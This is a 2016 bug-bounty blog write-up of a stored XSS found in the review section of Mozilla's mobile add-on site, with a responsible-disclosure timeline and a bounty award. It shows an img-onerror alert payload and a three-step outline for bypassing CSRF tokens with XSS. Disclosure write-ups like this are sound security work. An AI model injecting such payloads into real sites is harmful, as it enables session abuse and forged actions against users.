Monday, 22 February 2016

Cross Site Scripting (xss) in Mozilla Addon site

I am Paresh Parmar
This is my first writeUp.

So lets start.
It was 2016-02-09 , i was reading blog of Ashar javed.

After reading that blog, i set my target to mozilla addons
it was mobile and xss days for me ;)
so i was hunting only mobile sites.
I am using this user-agent string
Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0.

So let's Go
After setting up target, i choosed review section endpoint for hunting.

For example:
here you can write review about particular Addon!

so I gave 5 star to that addon :p and in review i wrote

<img src=x onerror=alert(document.domain)>
And submitted review and bOom!!! XSS Executed.

Within two minutes, i found this simple Xss .
i reported this issue to
After reporting this issue i started Digging into this

as far as i know, we can bypass CSRF protection of that page via Xss .
There's three step to Bypass csrf Token using Xss:

1. First request the form
2. Extract the valid csrf token
3. and submit the form using the valid csrf token
here's super Example about XMLHttpREQUEST
Reference :

After Only 12 Hours, they confirmed this issue. and in just 2 days they fixed this Issue
here's commit

For regarding bounty i sent email to along with bugzilla report id and Another Poc ;)
After Few Days, i got this mail

here's Video PoC:

2016-02-09 13:35:54 PST - Report Sent

2016-02-10 07:10:17 PST - Confirmed

2016-02-11 08:53:31 PST - Fixed

2016-02-20 - Bounty Awarded 3000$

Special Thanks to Mozilla BugBounty/Bugzilla team.